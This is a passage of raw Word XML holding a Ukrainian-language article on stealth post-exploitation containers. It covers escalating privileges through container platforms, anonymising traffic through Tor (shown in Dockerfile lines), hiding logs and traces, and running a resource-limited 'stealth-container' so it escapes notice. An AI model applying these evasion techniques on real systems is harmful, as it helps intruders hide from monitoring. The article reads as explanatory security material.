          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> механізми для ескалації привілеїв. Це здійсню</w:t>
      </w:r>
      <w:r w:rsidR="00CA3CCB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ється</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> шляхом використання уразливостей в контейнерних платформах (Docker, Kubernetes). Стелс-контейнер отриму</w:t>
      </w:r>
      <w:r w:rsidR="00CA3CCB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>є</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступ до критичних ресурсів хоста, таких як файлові системи, мережеві інтерфейси або навіть доступ до системи управління контейнерами</w:t>
      </w:r>
      <w:r w:rsidR="00CA3CCB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRDefault="00CA3CCB" w:rsidP="00BB02FF">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4. </w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Ш</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ифрування та збереження слідів</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D56D15" w:rsidRPr="003C7FE5" w:rsidRDefault="00CA3CCB" w:rsidP="00CA3CCB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"># Використовуємо </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Tor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для маршрутизації всього вихідного трафіку через анонімну мережу</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D56D15" w:rsidRPr="003C7FE5" w:rsidRDefault="00CA3CCB" w:rsidP="00CA3CCB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">RUN </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> add tor &amp;&amp; \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA3CCB" w:rsidRPr="003C7FE5" w:rsidRDefault="00CA3CCB" w:rsidP="00CA3CCB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tor &amp; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D56D15" w:rsidRPr="003C7FE5" w:rsidRDefault="00D56D15" w:rsidP="00CA3CCB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CA3CCB" w:rsidRPr="00CA3CCB" w:rsidRDefault="00CA3CCB" w:rsidP="00CA3CCB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>RUN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA3CCB" w:rsidRPr="00CA3CCB" w:rsidRDefault="00CA3CCB" w:rsidP="00CA3CCB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Налаштовуємо</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>проксі</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>скриптів</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> та </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>програм</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>щоб</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> весь </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>трафік</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>йшов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA3CCB">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Tor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CA3CCB" w:rsidRPr="003C7FE5" w:rsidRDefault="00CA3CCB" w:rsidP="00CA3CCB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ENV </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http_proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA3CCB" w:rsidRPr="003C7FE5" w:rsidRDefault="00CA3CCB" w:rsidP="00CA3CCB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ENV </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>htt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"socks5h://127.0.0.1:9050"</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA3CCB" w:rsidRPr="00CA3CCB" w:rsidRDefault="00CA3CCB" w:rsidP="00CA3CCB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="993"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Arial Unicode MS" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https_proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"socks5h://127.0.0.1:9050"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA3CCB" w:rsidRDefault="00CA3CCB" w:rsidP="00BB02FF">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AE2010" w:rsidRDefault="00AE2010" w:rsidP="00BB02FF">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AE2010">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Стелс-контейнер зазвичай використовує різні механізми для шифрування своїх внутрішніх даних та команд, що ускладнює їх виявлення. Це може включати шифрування файлових систем або конфігураційних файлів контейнера, що дозволяє приховати чутливі дані. Також використовуються технології шифрування для всього трафіку, що передається між контейнером і зловмисником, наприклад, через HTTPS або SSH тунелі. Крім того, стелс-контейнер може записувати логи в спеціальні місця, приховані від стандартного моніторингу, або застосовувати методи для очищення слідів операцій, що виконуються контейнером, щоб запобігти виявленню.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRPr="00BB02FF" w:rsidRDefault="00AE2010" w:rsidP="00BB02FF">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5. </w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Кон</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>троль за поведінкою контейнера</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRDefault="00AE2010" w:rsidP="00BB02FF">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AE2010">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Стелс-контейнер може бути налаштований таким чином, щоб зменшити свою активність та вплив на хост-систему, що дозволяє уникнути привертання уваги. Це може включати запуск контейнера в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2010">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>тихому</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2010">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> режимі, коли він виконує лише мінімально необхідні операції і обмежується тільки критично важливими функціями. Крім того, може бути використана система для обмеження логування та аудитів, що гарантує, що будь-яка діяльність </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2010">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>контейнера не фіксується стандартними інструментами моніторингу, тим самим знижуючи ймовірність виявлення.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRDefault="00AE2010" w:rsidP="00BB02FF">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6. Мінімізація впливу на ресурси</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265835" w:rsidRPr="00265835" w:rsidRDefault="00265835" w:rsidP="00265835">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Arial Unicode MS" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00265835">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00265835">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> run -d --name stealth-container --memory 64m --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00265835">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00265835">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-shares 512 --memory-swap 64m my-hidden-container</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE2010" w:rsidRPr="00BB02FF" w:rsidRDefault="00AE2010" w:rsidP="00AE2010">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BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Одним із аспектів стелс-постексплуатаційного контейнера є його здатність мінімізувати використання ресурсів хоста, щоб знизити ймовірність виявлення через моніторинг використан</w:t>
      </w:r>
      <w:r w:rsidR="00A93F26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ня CPU, пам’</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>яті або дискового простору. Зловмисник може настроїти контейнер так, щоб він споживав мінімум системних ресурсів, залишаючи хост-систему функціонувати в нормальному режимі.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRPr="00BB02FF" w:rsidRDefault="0095301E" w:rsidP="00BB02FF">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95301E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Стелс-постексплуатаційні контейнери часто використовуються в складних та</w:t>
      </w:r>
      <w:r w:rsidR="00A93F26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> продвинутих атаках, таких як </w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
